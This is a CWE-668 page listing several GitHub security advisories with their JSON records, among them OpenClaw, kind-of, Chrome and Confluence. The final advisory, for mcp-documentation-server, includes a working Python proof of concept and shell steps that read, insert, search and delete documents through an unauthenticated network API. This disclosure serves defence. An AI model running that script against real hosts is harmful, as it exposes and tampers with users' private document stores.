Common Weakness Enumeration

CWE-668

Discouraged

Exposure of Resource to Wrong Sphere

Abstraction: Class · Status: Draft

The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.

1251 vulnerabilities reference this CWE, most recent first.

GHSA-6C4R-G249-WV3C

Vulnerability from github – Published: 2026-07-02 17:06 – Updated: 2026-07-02 17:06
VLAI
Summary
OpenClaw: Sandboxed session spawn could expose the real workspace path to child prompts
Details

Summary

Sandboxed session spawn could expose the real workspace path to child prompts. In affected versions, a child session spawned from a sandboxed parent could forward the host workspace path into the child session prompt.

This advisory is scoped to the named feature and configuration. It does not change OpenClaw's trusted-operator model: authenticated Gateway operators, installed plugins, and intentional local execution surfaces remain trusted unless a separate policy, approval, allowlist, sandbox, or auth boundary is crossed.

Impact

When the affected feature is enabled and reachable, this could reveal host workspace location or related memory context to the child model. Practical impact depends on the operator's configuration and whether lower-trust input can reach that path.

Patched Versions

The first stable patched version is 2026.4.26.

Mitigations

avoid spawning child sessions from sensitive sandboxed workspaces until patched. As general hardening, keep channel and tool allowlists narrow, avoid sharing one Gateway between mutually untrusted users, and disable the affected feature when it is not needed.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2026.4.25"
      },
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.4.26"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-02T17:06:10Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nSandboxed session spawn could expose the real workspace path to child prompts. In affected versions, a child session spawned from a sandboxed parent could forward the host workspace path into the child session prompt.\n\nThis advisory is scoped to the named feature and configuration. It does not change OpenClaw\u0027s trusted-operator model: authenticated Gateway operators, installed plugins, and intentional local execution surfaces remain trusted unless a separate policy, approval, allowlist, sandbox, or auth boundary is crossed.\n\n### Impact\n\nWhen the affected feature is enabled and reachable, this could reveal host workspace location or related memory context to the child model. Practical impact depends on the operator\u0027s configuration and whether lower-trust input can reach that path.\n\n### Patched Versions\n\nThe first stable patched version is `2026.4.26`.\n\n### Mitigations\n\navoid spawning child sessions from sensitive sandboxed workspaces until patched. As general hardening, keep channel and tool allowlists narrow, avoid sharing one Gateway between mutually untrusted users, and disable the affected feature when it is not needed.",
  "id": "GHSA-6c4r-g249-wv3c",
  "modified": "2026-07-02T17:06:10Z",
  "published": "2026-07-02T17:06:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6c4r-g249-wv3c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw: Sandboxed session spawn could expose the real workspace path to child prompts"
}

GHSA-6C8F-QPHG-QJGP

Vulnerability from github – Published: 2020-03-31 15:59 – Updated: 2021-08-23 15:03
VLAI
Summary
Validation Bypass in kind-of
Details

Versions of kind-of 6.x prior to 6.0.3 are vulnerable to a Validation Bypass. A maliciously crafted object can alter the result of the type check, allowing attackers to bypass the type checking validation.

Recommendation

Upgrade to versions 6.0.3 or later.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "kind-of"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2019-20149"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-03-31T15:59:30Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Versions of `kind-of` 6.x prior to 6.0.3 are vulnerable to a Validation Bypass. A maliciously crafted object can alter the result of the type check, allowing attackers to bypass the type checking validation. \n\n\n## Recommendation\n\nUpgrade to versions 6.0.3 or later.",
  "id": "GHSA-6c8f-qphg-qjgp",
  "modified": "2021-08-23T15:03:55Z",
  "published": "2020-03-31T15:59:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20149"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jonschlinkert/kind-of/issues/30"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jonschlinkert/kind-of/pull/31"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jonschlinkert/kind-of/commit/1df992ce6d5a1292048e5fe9c52c5382f941ee0b"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/SNYK-JS-KINDOF-537849"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/1490"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Validation Bypass in kind-of"
}

GHSA-6CFF-MJ8V-FVR9

Vulnerability from github – Published: 2022-05-13 01:04 – Updated: 2022-05-13 01:04
VLAI
Details

Atlassian Confluence Server and Data Center before version 6.13.1 allows an authenticated user to download a deleted page via the word export feature.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-20237"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-02-13T18:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Atlassian Confluence Server and Data Center before version 6.13.1 allows an authenticated user to download a deleted page via the word export feature.",
  "id": "GHSA-6cff-mj8v-fvr9",
  "modified": "2022-05-13T01:04:38Z",
  "published": "2022-05-13T01:04:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20237"
    },
    {
      "type": "WEB",
      "url": "https://jira.atlassian.com/browse/CONFSERVER-57814"
    },
    {
      "type": "WEB",
      "url": "https://www.excellium-services.com/cert-xlm-advisory/cve-2018-20237"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/107041"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6CPV-GPJR-7H64

Vulnerability from github – Published: 2022-05-24 19:14 – Updated: 2022-05-24 19:14
VLAI
Details

Some js interfaces in the Xiaomi community were exposed, causing sensitive functions to be maliciously called on Xiaomi community app Affected Version <3.0.210809

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-14130"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-09-16T12:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Some js interfaces in the Xiaomi community were exposed, causing sensitive functions to be maliciously called on Xiaomi community app Affected Version \u003c3.0.210809",
  "id": "GHSA-6cpv-gpjr-7h64",
  "modified": "2022-05-24T19:14:52Z",
  "published": "2022-05-24T19:14:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14130"
    },
    {
      "type": "WEB",
      "url": "https://privacy.mi.com/trust#/security/vulnerability-management/vulnerability-announcement/detail?id=25\u0026locale=zh"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-6CWH-R74G-R47Q

Vulnerability from github – Published: 2022-05-13 01:43 – Updated: 2022-05-13 01:43
VLAI
Details

Insufficient Policy Enforcement in Devtools remote debugging in Google Chrome prior to 62.0.3202.62 allowed a remote attacker to obtain access to remote debugging functionality via a crafted HTML page, aka a Referer leak.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-15393"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-668"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-02-07T23:29:00Z",
    "severity": "HIGH"
  },
  "details": "Insufficient Policy Enforcement in Devtools remote debugging in Google Chrome prior to 62.0.3202.62 allowed a remote attacker to obtain access to remote debugging functionality via a crafted HTML page, aka a Referer leak.",
  "id": "GHSA-6cwh-r74g-r47q",
  "modified": "2022-05-13T01:43:45Z",
  "published": "2022-05-13T01:43:45Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15393"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2017:2997"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2017/10/stable-channel-update-for-desktop.html"
    },
    {
      "type": "WEB",
      "url": "https://crbug.com/732751"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/201710-24"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2017/dsa-4020"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/101482"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-6F5R-5672-72J7

Vulnerability from github – Published: 2026-07-15 23:26 – Updated: 2026-07-15 23:26
VLAI
Summary
@andrea9293/mcp-documentation-server: Web UI API binds to all interfaces without authentication by default
Details

Summary

@andrea9293/mcp-documentation-server v1.13.0 documents that a Web UI starts automatically on port 3080. However, the Web UI/API appears to bind to all network interfaces by default (*:3080 / 0.0.0.0:3080) instead of localhost-only, and its document-management API endpoints do not require authentication.

As a result, any network-reachable client on the same LAN, VM network, or container bridge can access the document-admin API without credentials. In my reproduction, I was able to enumerate documents, add a document, read its full content, search across the corpus, and delete the document through the host's LAN IP.

The issue is not that a Web UI exists. The issue is that a local document-management Web UI/API is exposed on all interfaces by default without authentication.

Details

The README documents that the Web UI starts automatically and tells users to open:

http://localhost:3080

It also documents START_WEB_UI=true and WEB_PORT=3080 as the defaults.

The vulnerable behavior appears to come from starting the web server without binding it to localhost explicitly.

In src/server.ts, the Web UI is started unless START_WEB_UI=false:

if (process.env.START_WEB_UI !== 'false') {
    initializeDocumentManager().then(manager => {
        return startWebServer(undefined, manager);
    }).then(() => {
        console.error('[Server] Web UI started (port=' + (process.env.WEB_PORT || '3080') + ')');
    })...
}

In src/web-server.ts, the Express app appears to listen with only the port:

const server = app.listen(PORT, () => {
    console.log(`\n  🌐 MCP Documentation Server - Web UI`);
    console.log(`  ────────────────────────────────────`);
    console.log(`  Local:   http://localhost:${PORT}`);
    console.log(`  Network: http://0.0.0.0:${PORT}\n`);
});

With Express/Node, app.listen(PORT) without a host argument binds to all interfaces. In my reproduction, this resulted in:

LISTEN 0 511 *:3080 *:* users:(("MainThread",pid=1781375,fd=21))

The exposed API includes document-admin operations such as:

GET    /api/documents
GET    /api/documents/:id
POST   /api/documents
POST   /api/search-all
DELETE /api/documents/:id
GET    /api/config

I did not send any Authorization header in the PoC requests, and all tested operations succeeded.

PoC

Tested on v1.13.0.

1. Build from source

cd ~/Desktop
mkdir -p docsrv_repro_from_scratch
cd docsrv_repro_from_scratch

git clone https://github.com/andrea9293/mcp-documentation-server.git
cd mcp-documentation-server

git rev-parse HEAD
npm install --no-audit --no-fund
npm run build

ls -l dist/server.js
node -p "require('./package.json').version"

Expected version:

1.13.0

2. Start the server with default Web UI behavior

Do not set START_WEB_UI=false.

rm -rf /tmp/docsrv_base
mkdir -p /tmp/docsrv_base

MCP_BASE_DIR=/tmp/docsrv_base \
WEB_PORT=3080 \
node dist/server.js \
  </dev/null \
  >/tmp/docsrv_stdout.log \
  2>/tmp/docsrv_stderr.log &

DOCSRV_PID=$!
sleep 5

echo "DOCSRV_PID=$DOCSRV_PID"
ps -p "$DOCSRV_PID" -o pid,stat,cmd

3. Confirm that the Web UI/API binds to all interfaces

ss -ltnp | grep ':3080' || true

Observed:

LISTEN 0 511 *:3080 *:* users:(("MainThread",pid=1781375,fd=21))

This indicates the service is not bound only to 127.0.0.1.

4. Confirm that the API is reachable through the LAN IP

LAN_IP=$(hostname -I | awk '{print $1}')
echo "LAN_IP=$LAN_IP"

curl -sS --max-time 5 "http://$LAN_IP:3080/api/config"
echo

Observed:

LAN_IP=10.0.250.230
{"gemini_available":false,"embedding_model":"Xenova/all-MiniLM-L6-v2"}

No authentication header was sent.

5. Full unauthenticated document-admin PoC

cat > /tmp/docsrv_unauth_poc.py <<'PY'
#!/usr/bin/env python3
import json
import sys
import urllib.request
import urllib.error

HOST = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 3080
BASE = f"http://{HOST}:{PORT}"

def req(method, path, body=None):
    data = json.dumps(body).encode() if body is not None else None
    headers = {"Content-Type": "application/json"} if body is not None else {}
    r = urllib.request.Request(f"{BASE}{path}", data=data, method=method, headers=headers)
    with urllib.request.urlopen(r, timeout=10) as resp:
        raw = resp.read().decode()
        try:
            return resp.status, json.loads(raw or "null")
        except Exception:
            return resp.status, raw

def main():
    print(f"[poc] target = {BASE}")
    print("[poc] no Authorization header is sent")

    status, config = req("GET", "/api/config")
    print(f"[0] config: HTTP {status}, {config}")

    status, docs = req("GET", "/api/documents")
    print(f"[1] list documents: HTTP {status}, count={len(docs) if isinstance(docs, list) else 'unknown'}")

    marker = "ATTACKER_CONTROLLED_DOCUMENT_MARKER_unauth_network_api"
    body = {
        "title": "network-inserted-test-document",
        "content": marker + "\nThis document was inserted through the unauthenticated network API.",
        "metadata": {"source": "unauth-network-poc"}
    }

    status, added = req("POST", "/api/documents", body)
    print(f"[2] add document: HTTP {status}, response={added}")

    doc_id = None
    if isinstance(added, dict):
        doc_id = added.get("id") or added.get("document", {}).get("id")

    if not doc_id:
        status, docs = req("GET", "/api/documents")
        for d in docs:
            if d.get("title") == "network-inserted-test-document":
                doc_id = d.get("id")
                break

    if not doc_id:
        raise RuntimeError("could not locate inserted document id")

    print(f"[2] inserted id={doc_id}")

    status, doc = req("GET", f"/api/documents/{doc_id}")
    content = doc.get("content", "") if isinstance(doc, dict) else str(doc)
    print(f"[3] read document: HTTP {status}, marker_present={marker in content}")

    status, hits = req("POST", "/api/search-all", {
        "query": "ATTACKER_CONTROLLED_DOCUMENT_MARKER network inserted",
        "limit": 5
    })
    print(f"[4] search-all: HTTP {status}, response_prefix={str(hits)[:300]!r}")

    status, deleted = req("DELETE", f"/api/documents/{doc_id}")
    print(f"[5] delete document: HTTP {status}, response={deleted}")

    print("[poc] DONE")

if __name__ == "__main__":
    main()
PY

chmod +x /tmp/docsrv_unauth_poc.py

Run against localhost:

python3 /tmp/docsrv_unauth_poc.py 127.0.0.1 3080

Observed:

[poc] target = http://127.0.0.1:3080
[poc] no Authorization header is sent
[0] config: HTTP 200, {'gemini_available': False, 'embedding_model': 'Xenova/all-MiniLM-L6-v2'}
[1] list documents: HTTP 200, count=0
[2] add document: HTTP 200, response={'id': 'ef13280d7441d5bb', 'title': 'network-inserted-test-document', 'message': 'Document added successfully'}
[2] inserted id=ef13280d7441d5bb
[3] read document: HTTP 200, marker_present=True
[4] search-all: HTTP 200, response_prefix="[{'document_id': 'ef13280d7441d5bb', 'parent_index': 0, 'score': 1, 'content': 'ATTACKER_CONTROLLED_DOCUMENT_MARKER_unauth_network_api\\nThis document was inserted through the unauthenticated network API.'}]"
[5] delete document: HTTP 200, response={'success': True, 'message': 'Document "network-inserted-test-document" deleted'}
[poc] DONE

Run the same PoC against the host's LAN IP:

LAN_IP=$(hostname -I | awk '{print $1}')
python3 /tmp/docsrv_unauth_poc.py "$LAN_IP" 3080

Observed:

[poc] target = http://10.0.250.230:3080
[poc] no Authorization header is sent
[0] config: HTTP 200, {'gemini_available': False, 'embedding_model': 'Xenova/all-MiniLM-L6-v2'}
[1] list documents: HTTP 200, count=0
[2] add document: HTTP 200, response={'id': 'ef13280d7441d5bb', 'title': 'network-inserted-test-document', 'message': 'Document added successfully'}
[2] inserted id=ef13280d7441d5bb
[3] read document: HTTP 200, marker_present=True
[4] search-all: HTTP 200, response_prefix="[{'document_id': 'ef13280d7441d5bb', 'parent_index': 0, 'score': 1, 'content': 'ATTACKER_CONTROLLED_DOCUMENT_MARKER_unauth_network_api\\nThis document was inserted through the unauthenticated network API.'}]"
[5] delete document: HTTP 200, response={'success': True, 'message': 'Document "network-inserted-test-document" deleted'}
[poc] DONE

6. Cleanup

kill "$DOCSRV_PID" 2>/dev/null || true
fuser -k 3080/tcp 2>/dev/null || true
rm -rf /tmp/docsrv_base
rm -f /tmp/docsrv_unauth_poc.py
rm -f /tmp/docsrv_stdout.log /tmp/docsrv_stderr.log

Impact

This is a missing-authentication and unsafe-default network exposure issue for the Web UI/API.

A network-reachable attacker can access the document-management API without credentials. Depending on what the user stores in the documentation server, this may allow:

  • reading document titles, previews, and full document contents;
  • searching across the entire document corpus;
  • inserting attacker-controlled documents into the corpus;
  • deleting documents;
  • tampering with the user's local knowledge base used by the MCP assistant.

This can affect users who run the MCP server on laptops, workstations, dev VMs, or hosts connected to shared networks, VPNs, Docker bridges, or other routable local networks.

This is not a claim for unauthenticated remote code execution. The issue is that the documented Web UI/API is exposed on all interfaces by default and does not require authentication for document-admin operations.

A safer default would be to bind the Web UI/API to 127.0.0.1 by default, and require an explicit opt-in such as WEB_BIND_HOST=0.0.0.0 for network exposure. If network binding is supported, an authentication token should be required for document-management endpoints.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@andrea9293/mcp-documentation-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.13.0"
            },
            {
              "fixed": "1.13.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.13.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54504"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-668"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-15T23:26:57Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\n`@andrea9293/mcp-documentation-server` v1.13.0 documents that a Web UI starts automatically on port `3080`. However, the Web UI/API appears to bind to all network interfaces by default (`*:3080` / `0.0.0.0:3080`) instead of localhost-only, and its document-management API endpoints do not require authentication.\n\nAs a result, any network-reachable client on the same LAN, VM network, or container bridge can access the document-admin API without credentials. In my reproduction, I was able to enumerate documents, add a document, read its full content, search across the corpus, and delete the document through the host\u0027s LAN IP.\n\nThe issue is not that a Web UI exists. The issue is that a local document-management Web UI/API is exposed on all interfaces by default without authentication.\n\n### Details\n\nThe README documents that the Web UI starts automatically and tells users to open:\n\n```text\nhttp://localhost:3080\n```\n\nIt also documents `START_WEB_UI=true` and `WEB_PORT=3080` as the defaults.\n\nThe vulnerable behavior appears to come from starting the web server without binding it to localhost explicitly.\n\nIn `src/server.ts`, the Web UI is started unless `START_WEB_UI=false`:\n\n```ts\nif (process.env.START_WEB_UI !== \u0027false\u0027) {\n    initializeDocumentManager().then(manager =\u003e {\n        return startWebServer(undefined, manager);\n    }).then(() =\u003e {\n        console.error(\u0027[Server] Web UI started (port=\u0027 + (process.env.WEB_PORT || \u00273080\u0027) + \u0027)\u0027);\n    })...\n}\n```\n\nIn `src/web-server.ts`, the Express app appears to listen with only the port:\n\n```ts\nconst server = app.listen(PORT, () =\u003e {\n    console.log(`\\n  \ud83c\udf10 MCP Documentation Server - Web UI`);\n    console.log(`  \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500`);\n    console.log(`  Local:   http://localhost:${PORT}`);\n    console.log(`  Network: http://0.0.0.0:${PORT}\\n`);\n});\n```\n\nWith Express/Node, `app.listen(PORT)` without a host argument binds to all interfaces. In my reproduction, this resulted in:\n\n```text\nLISTEN 0 511 *:3080 *:* users:((\"MainThread\",pid=1781375,fd=21))\n```\n\nThe exposed API includes document-admin operations such as:\n\n```text\nGET    /api/documents\nGET    /api/documents/:id\nPOST   /api/documents\nPOST   /api/search-all\nDELETE /api/documents/:id\nGET    /api/config\n```\n\nI did not send any `Authorization` header in the PoC requests, and all tested operations succeeded.\n\n### PoC\n\nTested on v1.13.0.\n\n#### 1. Build from source\n\n```bash\ncd ~/Desktop\nmkdir -p docsrv_repro_from_scratch\ncd docsrv_repro_from_scratch\n\ngit clone https://github.com/andrea9293/mcp-documentation-server.git\ncd mcp-documentation-server\n\ngit rev-parse HEAD\nnpm install --no-audit --no-fund\nnpm run build\n\nls -l dist/server.js\nnode -p \"require(\u0027./package.json\u0027).version\"\n```\n\nExpected version:\n\n```text\n1.13.0\n```\n\n#### 2. Start the server with default Web UI behavior\n\nDo not set `START_WEB_UI=false`.\n\n```bash\nrm -rf /tmp/docsrv_base\nmkdir -p /tmp/docsrv_base\n\nMCP_BASE_DIR=/tmp/docsrv_base \\\nWEB_PORT=3080 \\\nnode dist/server.js \\\n  \u003c/dev/null \\\n  \u003e/tmp/docsrv_stdout.log \\\n  2\u003e/tmp/docsrv_stderr.log \u0026\n\nDOCSRV_PID=$!\nsleep 5\n\necho \"DOCSRV_PID=$DOCSRV_PID\"\nps -p \"$DOCSRV_PID\" -o pid,stat,cmd\n```\n\n#### 3. Confirm that the Web UI/API binds to all interfaces\n\n```bash\nss -ltnp | grep \u0027:3080\u0027 || true\n```\n\nObserved:\n\n```text\nLISTEN 0 511 *:3080 *:* users:((\"MainThread\",pid=1781375,fd=21))\n```\n\nThis indicates the service is not bound only to `127.0.0.1`.\n\n#### 4. Confirm that the API is reachable through the LAN IP\n\n```bash\nLAN_IP=$(hostname -I | awk \u0027{print $1}\u0027)\necho \"LAN_IP=$LAN_IP\"\n\ncurl -sS --max-time 5 \"http://$LAN_IP:3080/api/config\"\necho\n```\n\nObserved:\n\n```text\nLAN_IP=10.0.250.230\n{\"gemini_available\":false,\"embedding_model\":\"Xenova/all-MiniLM-L6-v2\"}\n```\n\nNo authentication header was sent.\n\n#### 5. Full unauthenticated document-admin PoC\n\n```bash\ncat \u003e /tmp/docsrv_unauth_poc.py \u003c\u003c\u0027PY\u0027\n#!/usr/bin/env python3\nimport json\nimport sys\nimport urllib.request\nimport urllib.error\n\nHOST = sys.argv[1] if len(sys.argv) \u003e 1 else \"127.0.0.1\"\nPORT = int(sys.argv[2]) if len(sys.argv) \u003e 2 else 3080\nBASE = f\"http://{HOST}:{PORT}\"\n\ndef req(method, path, body=None):\n    data = json.dumps(body).encode() if body is not None else None\n    headers = {\"Content-Type\": \"application/json\"} if body is not None else {}\n    r = urllib.request.Request(f\"{BASE}{path}\", data=data, method=method, headers=headers)\n    with urllib.request.urlopen(r, timeout=10) as resp:\n        raw = resp.read().decode()\n        try:\n            return resp.status, json.loads(raw or \"null\")\n        except Exception:\n            return resp.status, raw\n\ndef main():\n    print(f\"[poc] target = {BASE}\")\n    print(\"[poc] no Authorization header is sent\")\n\n    status, config = req(\"GET\", \"/api/config\")\n    print(f\"[0] config: HTTP {status}, {config}\")\n\n    status, docs = req(\"GET\", \"/api/documents\")\n    print(f\"[1] list documents: HTTP {status}, count={len(docs) if isinstance(docs, list) else \u0027unknown\u0027}\")\n\n    marker = \"ATTACKER_CONTROLLED_DOCUMENT_MARKER_unauth_network_api\"\n    body = {\n        \"title\": \"network-inserted-test-document\",\n        \"content\": marker + \"\\nThis document was inserted through the unauthenticated network API.\",\n        \"metadata\": {\"source\": \"unauth-network-poc\"}\n    }\n\n    status, added = req(\"POST\", \"/api/documents\", body)\n    print(f\"[2] add document: HTTP {status}, response={added}\")\n\n    doc_id = None\n    if isinstance(added, dict):\n        doc_id = added.get(\"id\") or added.get(\"document\", {}).get(\"id\")\n\n    if not doc_id:\n        status, docs = req(\"GET\", \"/api/documents\")\n        for d in docs:\n            if d.get(\"title\") == \"network-inserted-test-document\":\n                doc_id = d.get(\"id\")\n                break\n\n    if not doc_id:\n        raise RuntimeError(\"could not locate inserted document id\")\n\n    print(f\"[2] inserted id={doc_id}\")\n\n    status, doc = req(\"GET\", f\"/api/documents/{doc_id}\")\n    content = doc.get(\"content\", \"\") if isinstance(doc, dict) else str(doc)\n    print(f\"[3] read document: HTTP {status}, marker_present={marker in content}\")\n\n    status, hits = req(\"POST\", \"/api/search-all\", {\n        \"query\": \"ATTACKER_CONTROLLED_DOCUMENT_MARKER network inserted\",\n        \"limit\": 5\n    })\n    print(f\"[4] search-all: HTTP {status}, response_prefix={str(hits)[:300]!r}\")\n\n    status, deleted = req(\"DELETE\", f\"/api/documents/{doc_id}\")\n    print(f\"[5] delete document: HTTP {status}, response={deleted}\")\n\n    print(\"[poc] DONE\")\n\nif __name__ == \"__main__\":\n    main()\nPY\n\nchmod +x /tmp/docsrv_unauth_poc.py\n```\n\nRun against localhost:\n\n```bash\npython3 /tmp/docsrv_unauth_poc.py 127.0.0.1 3080\n```\n\nObserved:\n\n```text\n[poc] target = http://127.0.0.1:3080\n[poc] no Authorization header is sent\n[0] config: HTTP 200, {\u0027gemini_available\u0027: False, \u0027embedding_model\u0027: \u0027Xenova/all-MiniLM-L6-v2\u0027}\n[1] list documents: HTTP 200, count=0\n[2] add document: HTTP 200, response={\u0027id\u0027: \u0027ef13280d7441d5bb\u0027, \u0027title\u0027: \u0027network-inserted-test-document\u0027, \u0027message\u0027: \u0027Document added successfully\u0027}\n[2] inserted id=ef13280d7441d5bb\n[3] read document: HTTP 200, marker_present=True\n[4] search-all: HTTP 200, response_prefix=\"[{\u0027document_id\u0027: \u0027ef13280d7441d5bb\u0027, \u0027parent_index\u0027: 0, \u0027score\u0027: 1, \u0027content\u0027: \u0027ATTACKER_CONTROLLED_DOCUMENT_MARKER_unauth_network_api\\\\nThis document was inserted through the unauthenticated network API.\u0027}]\"\n[5] delete document: HTTP 200, response={\u0027success\u0027: True, \u0027message\u0027: \u0027Document \"network-inserted-test-document\" deleted\u0027}\n[poc] DONE\n```\n\nRun the same PoC against the host\u0027s LAN IP:\n\n```bash\nLAN_IP=$(hostname -I | awk \u0027{print $1}\u0027)\npython3 /tmp/docsrv_unauth_poc.py \"$LAN_IP\" 3080\n```\n\nObserved:\n\n```text\n[poc] target = http://10.0.250.230:3080\n[poc] no Authorization header is sent\n[0] config: HTTP 200, {\u0027gemini_available\u0027: False, \u0027embedding_model\u0027: \u0027Xenova/all-MiniLM-L6-v2\u0027}\n[1] list documents: HTTP 200, count=0\n[2] add document: HTTP 200, response={\u0027id\u0027: \u0027ef13280d7441d5bb\u0027, \u0027title\u0027: \u0027network-inserted-test-document\u0027, \u0027message\u0027: \u0027Document added successfully\u0027}\n[2] inserted id=ef13280d7441d5bb\n[3] read document: HTTP 200, marker_present=True\n[4] search-all: HTTP 200, response_prefix=\"[{\u0027document_id\u0027: \u0027ef13280d7441d5bb\u0027, \u0027parent_index\u0027: 0, \u0027score\u0027: 1, \u0027content\u0027: \u0027ATTACKER_CONTROLLED_DOCUMENT_MARKER_unauth_network_api\\\\nThis document was inserted through the unauthenticated network API.\u0027}]\"\n[5] delete document: HTTP 200, response={\u0027success\u0027: True, \u0027message\u0027: \u0027Document \"network-inserted-test-document\" deleted\u0027}\n[poc] DONE\n```\n\n#### 6. Cleanup\n\n```bash\nkill \"$DOCSRV_PID\" 2\u003e/dev/null || true\nfuser -k 3080/tcp 2\u003e/dev/null || true\nrm -rf /tmp/docsrv_base\nrm -f /tmp/docsrv_unauth_poc.py\nrm -f /tmp/docsrv_stdout.log /tmp/docsrv_stderr.log\n```\n\n### Impact\n\nThis is a missing-authentication and unsafe-default network exposure issue for the Web UI/API.\n\nA network-reachable attacker can access the document-management API without credentials. Depending on what the user stores in the documentation server, this may allow:\n\n- reading document titles, previews, and full document contents;\n- searching across the entire document corpus;\n- inserting attacker-controlled documents into the corpus;\n- deleting documents;\n- tampering with the user\u0027s local knowledge base used by the MCP assistant.\n\nThis can affect users who run the MCP server on laptops, workstations, dev VMs, or hosts connected to shared networks, VPNs, Docker bridges, or other routable local networks.\n\nThis is not a claim for unauthenticated remote code execution. The issue is that the documented Web UI/API is exposed on all interfaces by default and does not require authentication for document-admin operations.\n\nA safer default would be to bind the Web UI/API to `127.0.0.1` by default, and require an explicit opt-in such as `WEB_BIND_HOST=0.0.0.0` for network exposure. If network binding is supported, an authentication token should be required for document-management endpoints.",
  "id": "GHSA-6f5r-5672-72j7",
  "modified": "2026-07-15T23:26:57Z",
  "published": "2026-07-15T23:26:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/andrea9293/mcp-documentation-server/security/advisories/GHSA-6f5r-5672-72j7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/andrea9293/mcp-documentation-server/commit/37159d4e06b8ee50c3645b2496e3d3f6d32c47f9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/andrea9293/mcp-documentation-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/andrea9293/mcp-documentation-server/releases/tag/v1.13.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
